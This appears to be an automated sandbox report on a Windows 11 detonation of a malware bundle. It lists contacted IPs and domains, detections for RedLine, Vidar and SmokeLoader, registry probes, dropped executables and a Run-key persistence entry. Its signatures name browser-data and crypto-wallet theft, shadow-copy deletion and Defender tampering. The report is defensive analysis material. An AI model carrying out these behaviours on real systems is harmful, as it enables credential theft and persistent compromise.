| Country | Destination | Domain | Proto |
| N/A | 23.217.250.58:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 52.178.17.2:443 | tcp | |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 93.184.220.29:80 | crl3.digicert.com | tcp |
| N/A | 127.0.0.1:5985 | tcp |
Files
memory/4408-147-0x0000025C34500000-0x0000025C34510000-memory.dmp
memory/4408-146-0x0000025C34480000-0x0000025C34490000-memory.dmp
memory/4408-148-0x0000025C36B00000-0x0000025C36B04000-memory.dmp
memory/4408-149-0x0000025C36DF0000-0x0000025C36DF4000-memory.dmp
memory/4408-150-0x0000025C36DB0000-0x0000025C36DB1000-memory.dmp
memory/4408-151-0x0000025C36B30000-0x0000025C36B34000-memory.dmp
memory/4408-152-0x0000025C36B20000-0x0000025C36B21000-memory.dmp
memory/4408-153-0x0000025C36B20000-0x0000025C36B24000-memory.dmp
memory/4408-154-0x0000025C36A00000-0x0000025C36A01000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
244s
Max time network
1810s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\4529314.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
